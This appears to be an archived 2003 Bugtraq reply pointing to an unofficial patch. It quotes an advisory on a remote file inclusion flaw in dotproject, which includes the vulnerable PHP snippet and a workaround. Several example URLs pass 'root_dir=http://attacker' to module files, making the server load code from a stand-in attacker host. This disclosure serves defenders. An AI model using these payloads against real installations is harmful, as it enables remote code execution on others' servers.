Re: dotproject Remote Code Execution Vulnerability : Patch

From: Frog Man (leseulfrog@hotmail.com)
Date: 01/29/03

  • Next message: Richard M. Smith: "David Litchfield talks about the SQL Worm in the Washington Post"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Wed, 29 Jan 2003 16:35:49 +0100
    
    

    A non-official patch has been created for this hole and is published on
    http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=ush
    version) .

    >From: mindwarper@hush.com
    >To: bugtraq@securityfocus.com
    >Subject: dotproject Remote Code Execution Vulnerability
    >Date: Wed, 29 Jan 2003 04:02:24 -0800
    >
    >dotproject Remote Code Execution Vulnerability (By Mindwarper)
    >
    ><------- ------->
    >
    >----------------------
    >Vendor Information:
    >----------------------
    >
    >Homepage : http://www.dotproject.net
    >Vendor : informed
    >Mailed advisory: 28/01/03
    >Vender Response : None
    >
    >
    >----------------------
    >Affected Versions:
    >----------------------
    >
    >dev20030121
    >
    >
    >----------------------
    >Vulnerability:
    >----------------------
    >
    >
    >dotproject is a PHP+MySQL beta level web based project management and
    >tracking tool
    >that dotmarketing started in Dec. 2000.
    >Inside the directory /modules/ multiple files try to include
    >classdefs/date.php
    >without defining $root_dir first and allow remote attackers to inject their
    >own
    >servers if globals are set on.
    >
    >Example Code from modules/projects/addedit.php:
    >
    >******
    >
    ><?php
    >##
    >## Files modules: index page re-usable sub-table
    >##
    >
    >require_once( "$root_dir/classdefs/date.php" );
    >$df = $AppUI->getPref('SHDATEFORMAT');
    >$tf = $AppUI->getPref('TIMEFORMAT');
    >
    >******
    >
    >As you can see nothing happens before the require_once function is called
    >and therefore
    >with globals set on an attacker may include remote files.
    >
    >Example:
    >
    >http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker
    >
    >this works also on
    >
    >http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
    >http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
    >http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
    >http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
    >http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
    >
    >
    >----------------------
    >Solution:
    >----------------------
    >
    >Please check the vendor's website for new patches.
    >
    >As a temporary solution, create a .htaccess file that contains 'Deny from
    >all'.
    >Place it in the /modules/ directory and that should block remote users from
    >accessing it.
    >
    >
    >----------------------
    >Contact:
    >----------------------
    >
    >Name: Mindwarper
    >Email: mindwarper@hush.com
    >Website: http://mindlock.bestweb.net
    >
    >
    ><------- ------->
    >
    >
    >
    >
    >Concerned about your privacy? Follow this link to get
    >FREE encrypted email: https://www.hushmail.com/?l=2
    >
    >Big $$$ to be made with the HushMail Affiliate Program:
    >https://www.hushmail.com/about.php?subloc=affiliate&l=427">F1363ckj6RLdwKOioIq00003bab@hotmail.com

    _________________________________________________________________